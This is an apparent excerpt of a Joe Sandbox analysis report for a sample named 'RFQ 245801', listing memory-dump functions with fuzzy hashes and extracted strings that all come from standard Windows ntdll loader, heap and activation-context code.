                                                                                                                                                                                  • Opcode Fuzzy Hash: f626bbc94354c7186721b8d20a6d1870810694c7467ba69f399b8d16718b4cc9
                                                                                                                                                                                  • Instruction Fuzzy Hash: D6919B71548345AFDB62DF26CC44FABFAECFB84684F40092EFA8896155E770D9048B63
                                                                                                                                                                                  Function 0175273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017922B6
                                                                                                                                                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017921D9, 017922B1
                                                                                                                                                                                  • .Local, xrefs: 017528D8
                                                                                                                                                                                  • SXS: %s() passed the empty activation context, xrefs: 017921DE
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                                                  • API String ID: 0-1239276146
                                                                                                                                                                                  • Opcode ID: 5664e47b0dcf912ab1412f4f4c21ce202c0ff37e43499069d552ae061a06fc43
                                                                                                                                                                                  • Instruction ID: fd250eb193926f936f7e31ca75b53a53e3bbd56c612242a5179b674cff0fc357
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5664e47b0dcf912ab1412f4f4c21ce202c0ff37e43499069d552ae061a06fc43
                                                                                                                                                                                  • Instruction Fuzzy Hash: A2A1BE31944229DBDB65DF68D888BA9F7B0BF58314F2501E9DD08AB352D7709E84CF90
                                                                                                                                                                                  Function 01754AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01793437
                                                                                                                                                                                  • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0179342A
                                                                                                                                                                                  • RtlDeactivateActivationContext, xrefs: 01793425, 01793432, 01793451
                                                                                                                                                                                  • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01793456
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                                                                                  • API String ID: 0-1245972979
                                                                                                                                                                                  • Opcode ID: 3c8e57c145ff1849f13a3891823b9cae461e41030f169a02d235a86d6a5e0989
                                                                                                                                                                                  • Instruction ID: 07f265c53810513e4e3b694b74ac580ef6125ed54c84b33e5daad3f8c8d1ff76
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3c8e57c145ff1849f13a3891823b9cae461e41030f169a02d235a86d6a5e0989
                                                                                                                                                                                  • Instruction Fuzzy Hash: D0613476604B129BDB22CF2CC885B3AF7E1BF80B50F158559EC569B291E770EC41CB91
                                                                                                                                                                                  Function 017264AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0178106B
                                                                                                                                                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01781028
                                                                                                                                                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017810AE
                                                                                                                                                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01780FE5
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                                                  • API String ID: 0-1468400865
                                                                                                                                                                                  • Opcode ID: 526fa3efb6e44a0765825f4fb5f37c448d6c7b5e90e1a8ed0673de6e97b40941
                                                                                                                                                                                  • Instruction ID: bcbe1a320d2ebd5edc350c5e78a5339bc746e8df7e7a3d2501e45a3a26cd2abc
                                                                                                                                                                                  • Opcode Fuzzy Hash: 526fa3efb6e44a0765825f4fb5f37c448d6c7b5e90e1a8ed0673de6e97b40941
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A71E3B19043159FCB21EF19C888B9BBFA8EF94764F500469FD488B14AD334D589CBD2
                                                                                                                                                                                  Function 0174245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • LdrpDynamicShimModule, xrefs: 0178A998
                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 0178A9A2
                                                                                                                                                                                  • apphelp.dll, xrefs: 01742462
                                                                                                                                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0178A992
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                  • API String ID: 0-176724104
                                                                                                                                                                                  • Opcode ID: af68c29aedbf4c66b0b088be0dfeaef9ddafbabf06e4d26b17a7971867058cc1
                                                                                                                                                                                  • Instruction ID: 5b1b71c2057f22ad524ea62e24e14d29c56bae0c563780150a9632fe815c2e8b
                                                                                                                                                                                  • Opcode Fuzzy Hash: af68c29aedbf4c66b0b088be0dfeaef9ddafbabf06e4d26b17a7971867058cc1
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F312A77640202ABDB31AF5DD885E6AFBB8FB84714F26005AFD01A7249D7B05A41CB40
                                                                                                                                                                                  Function 017329A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • HEAP: , xrefs: 01733264
                                                                                                                                                                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0173327D
                                                                                                                                                                                  • HEAP[%wZ]: , xrefs: 01733255
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                                                                  • API String ID: 0-617086771
                                                                                                                                                                                  • Opcode ID: 061dad94a5e6df17c526cb95543c0b923feeab6042300fe9f22b0fe3abeed9c8
                                                                                                                                                                                  • Instruction ID: 6d9ef0ee985e5aafab084fec2d092322e071d686ca71c999b661f3be137bc984
                                                                                                                                                                                  • Opcode Fuzzy Hash: 061dad94a5e6df17c526cb95543c0b923feeab6042300fe9f22b0fe3abeed9c8
                                                                                                                                                                                  • Instruction Fuzzy Hash: 63929A71A046499FEB25CF68C444BAEFBF1FF88300F188099E959AB392D735A945CF50
                                                                                                                                                                                  Function 01730770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                  • API String ID: 0-4253913091
                                                                                                                                                                                  • Opcode ID: 62b4da434b645814e0e45186ba4ba17f8dca39d1775f0804cb837393180d3e20
                                                                                                                                                                                  • Instruction ID: 29321822eee6bba1b9de94d38d6221337ff291e1e0c6ee4fc84571cbb21b5b03
                                                                                                                                                                                  • Opcode Fuzzy Hash: 62b4da434b645814e0e45186ba4ba17f8dca39d1775f0804cb837393180d3e20
                                                                                                                                                                                  • Instruction Fuzzy Hash: ABF1BE70A40606DFEB25DF68C894B6AF7F5FF84304F1481A8E5169B386D734EA81CB90
                                                                                                                                                                                  Function 01746962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID: $@
                                                                                                                                                                                  • API String ID: 2994545307-1077428164
                                                                                                                                                                                  • Opcode ID: dcb329dc1fb1b03771abfadf3c46bfbb24f0c9a5df5cad27fb6d66352f472771
                                                                                                                                                                                  • Instruction ID: 7758d3631844b52ac7abe1bbad1c800a5075a946ea4543a1b62b50a0e955725a
                                                                                                                                                                                  • Opcode Fuzzy Hash: dcb329dc1fb1b03771abfadf3c46bfbb24f0c9a5df5cad27fb6d66352f472771
                                                                                                                                                                                  • Instruction Fuzzy Hash: FAC27F716083419FE72ACF28C881BABFBE5AF89754F04896DF999C7241D734D844CB62
                                                                                                                                                                                  Function 0171A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                                                  • API String ID: 0-2779062949
                                                                                                                                                                                  • Opcode ID: 18195bd714d1e777f06cde65608d3d29073deef7e9fec82329e3ee7ca454cbb2
                                                                                                                                                                                  • Instruction ID: dc928f80127ced58e0ef87ff949d10475f54df84fb6e50b54ea6b6f822f14ad6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 18195bd714d1e777f06cde65608d3d29073deef7e9fec82329e3ee7ca454cbb2
                                                                                                                                                                                  • Instruction Fuzzy Hash: 28A13E7191162A9BDF329F68CC88BE9F7B8EF48710F1041EAD909A7251D7359E84CF50
                                                                                                                                                                                  Function 01740BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • LdrpCheckModule, xrefs: 0178A117
                                                                                                                                                                                  • Failed to allocated memory for shimmed module list, xrefs: 0178A10F
                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 0178A121
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                  • API String ID: 0-161242083
                                                                                                                                                                                  • Opcode ID: 6452f3f4cf98fc84dd1cc9ff705893313fc26eea79fcf157210cd7d3cf937e31
                                                                                                                                                                                  • Instruction ID: 6b33cafa93b402765dddbb133e043f63865cef688884d5d85d4d4edb2d82b718
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6452f3f4cf98fc84dd1cc9ff705893313fc26eea79fcf157210cd7d3cf937e31
                                                                                                                                                                                  • Instruction Fuzzy Hash: EB71DE71A00206DFDB25EF68C984AFEF7F8FB84204F14406DE942EB255E774AA42CB54
                                                                                                                                                                                  Function 01730A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                  • API String ID: 0-1334570610
                                                                                                                                                                                  • Opcode ID: be414006958ce051c306843d2d8c435ac6df46970c6e9b48cebc46c540d9592f
                                                                                                                                                                                  • Instruction ID: 2d8cb52d0606861c33f70375b2176dade747ac617b6950b02afe8fd05d503d43
                                                                                                                                                                                  • Opcode Fuzzy Hash: be414006958ce051c306843d2d8c435ac6df46970c6e9b48cebc46c540d9592f
                                                                                                                                                                                  • Instruction Fuzzy Hash: E761CE70600301DFDB29DF28C844B6AFBE1FF85308F148599E4498F296D770E981CB91
                                                                                                                                                                                  Function 0175C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Failed to reallocate the system dirs string !, xrefs: 017982D7
                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 017982E8
                                                                                                                                                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 017982DE
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                  • API String ID: 0-1783798831
                                                                                                                                                                                  • Opcode ID: 269372401ed8d4db53268a4c3476bd900d2167a89f271692cc105e4977fbde1c
                                                                                                                                                                                  • Instruction ID: 69bde59306c79a7395239508ad7fd6823f835fa1ea3607fcc5cc1d038a67e0e1
                                                                                                                                                                                  • Opcode Fuzzy Hash: 269372401ed8d4db53268a4c3476bd900d2167a89f271692cc105e4977fbde1c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4E41F372544305ABD722EB68DC48B5BF7ECEF48A50F10492AF955D3299E7B0D900CB91
                                                                                                                                                                                  Function 017DC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • @, xrefs: 017DC1F1
                                                                                                                                                                                  • PreferredUILanguages, xrefs: 017DC212
                                                                                                                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 017DC1C5
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                                                                  • API String ID: 0-2968386058
                                                                                                                                                                                  • Opcode ID: 4b814b5e3e37f7bcf8e4c098e9275b7e9808212f70324ff0982c34a2e18d5c85
                                                                                                                                                                                  • Instruction ID: 2744613aea18f2d4fcb337b72f6fa15084ce138cda665eac1e1fdaa9dd50c5f5
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4b814b5e3e37f7bcf8e4c098e9275b7e9808212f70324ff0982c34a2e18d5c85
                                                                                                                                                                                  • Instruction Fuzzy Hash: 23416371E0420DEBDB12DAD8C895FEEFBBDAB18700F14416EEA09B7244D774AA44CB50
                                                                                                                                                                                  Function 017B4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                                                                  • API String ID: 0-1373925480
                                                                                                                                                                                  • Opcode ID: 515579f8ab8152fa82f5f1732b57a79be4200f95fc45834dee2c64bdd5f09a34
                                                                                                                                                                                  • Instruction ID: f8fa6b3dccd98f52f59df9a17c2f3ca44820691accc96306994187fa7b2ed058
                                                                                                                                                                                  • Opcode Fuzzy Hash: 515579f8ab8152fa82f5f1732b57a79be4200f95fc45834dee2c64bdd5f09a34
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A41F431A04658CBEB26DB99C888BEDFBB8FF95340F140469D903EB796D7349941CB50
                                                                                                                                                                                  Function 017A4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 017A4899
                                                                                                                                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 017A4888
                                                                                                                                                                                  • LdrpCheckRedirection, xrefs: 017A488F
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                  • API String ID: 0-3154609507
                                                                                                                                                                                  • Opcode ID: b46b5da07d54777afab50feeec9354a20c09631ec7043561f3f0a17507323c3e
                                                                                                                                                                                  • Instruction ID: 09272011ce66559ef06b665e42738e439b865f3bc093614727b83b3845bac2c1
                                                                                                                                                                                  • Opcode Fuzzy Hash: b46b5da07d54777afab50feeec9354a20c09631ec7043561f3f0a17507323c3e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5241D332A442919FCB21CE1CE840A26FBE4EFC9A50F49076DED4AD7215D7B2D800CB81
                                                                                                                                                                                  Function 01730BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                  • API String ID: 0-2558761708
                                                                                                                                                                                  • Opcode ID: 87542aeba5acd1e7d055acadcfbb066c3239633e015d3f1c0fd13a17bf9898b3
                                                                                                                                                                                  • Instruction ID: 675aeddb6bd654cf8152107888ce909b9f089d7b66c6cefb89aa40b4b5abe9e9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 87542aeba5acd1e7d055acadcfbb066c3239633e015d3f1c0fd13a17bf9898b3
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3911AC32395142DFDB29EA1CC859B6AF3A5EF80616F1881A9F40ACB65ADB30D841CB50
                                                                                                                                                                                  Function 017A20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Process initialization failed with status 0x%08lx, xrefs: 017A20F3
                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 017A2104
                                                                                                                                                                                  • LdrpInitializationFailure, xrefs: 017A20FA
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                  • API String ID: 0-2986994758
                                                                                                                                                                                  • Opcode ID: 36f83d614d1e48cce970d1b8153e00c22428edc27ec49dbff6a4bc9c7bbd808a
                                                                                                                                                                                  • Instruction ID: aba1b627513cf19e9f75397be503d447c436f93d16b0204a25c0910851822c3b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 36f83d614d1e48cce970d1b8153e00c22428edc27ec49dbff6a4bc9c7bbd808a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3FF0FC76780309BBE725D64CDC5AF99B7ACFB81B54F90046DFB00772C6D5B0A640CA51
                                                                                                                                                                                  Function 017303E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                                                  • String ID: #%u
                                                                                                                                                                                  • API String ID: 48624451-232158463
                                                                                                                                                                                  • Opcode ID: 90bbda21c5f6cc3c504df7270ca4d87435bcc0373c26f78fab9371f111f3799a
                                                                                                                                                                                  • Instruction ID: c6dae95a90671388209164b7f2a108ee5cbe164f6dc5b3dfb6bb940baae24d97
                                                                                                                                                                                  • Opcode Fuzzy Hash: 90bbda21c5f6cc3c504df7270ca4d87435bcc0373c26f78fab9371f111f3799a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D715971A0014A9FDB11DFA8C994FAEFBF8BF48704F144065E905E7256EA78EE41CB60
                                                                                                                                                                                  Function 0172A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • LdrResSearchResource Enter, xrefs: 0172AA13
                                                                                                                                                                                  • LdrResSearchResource Exit, xrefs: 0172AA25
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                                                                  • API String ID: 0-4066393604
                                                                                                                                                                                  • Opcode ID: f0851d7fa35336b496b1da40b739ea430652871fa4fece9d03b7337824f811df
                                                                                                                                                                                  • Instruction ID: 5c86fc2b37721d00ee9ebf37d6f4eb1811ad5a57431af5b2108e2b5e93df3245
                                                                                                                                                                                  • Opcode Fuzzy Hash: f0851d7fa35336b496b1da40b739ea430652871fa4fece9d03b7337824f811df
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0BE17E71E40269AFEB22DE9CC984BAEFBBAFF14710F10446AE901E7651D734D942CB50
                                                                                                                                                                                  Function 017EA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: `$`
                                                                                                                                                                                  • API String ID: 0-197956300
                                                                                                                                                                                  • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                                                  • Instruction ID: bed465f9165ee9c69c1ca7c9f8acdab98f908a023f900b2423c7336cc770c5a9
                                                                                                                                                                                  • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                                                  • Instruction Fuzzy Hash: FAC1C1312043429BEB25CF28C849B6BFBE5AFD8318F184A2DF696CB291D774D505CB52
                                                                                                                                                                                  Function 0179E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID: Legacy$UEFI
                                                                                                                                                                                  • API String ID: 2994545307-634100481
                                                                                                                                                                                  • Opcode ID: d83b15bb7f475951f825f10e5ba0a230fe13e8f53909ea05dff4fb98af790a40
                                                                                                                                                                                  • Instruction ID: 065c3699c00c5f04cb40dc7058710cceebe46d6c75e7407d6f24422f1acb81e7
                                                                                                                                                                                  • Opcode Fuzzy Hash: d83b15bb7f475951f825f10e5ba0a230fe13e8f53909ea05dff4fb98af790a40
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C615871E407199FDB24DFA8D844BAEFBB9FB48700F14406DE649EB291DB31A944CB50
                                                                                                                                                                                  Function 017C43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
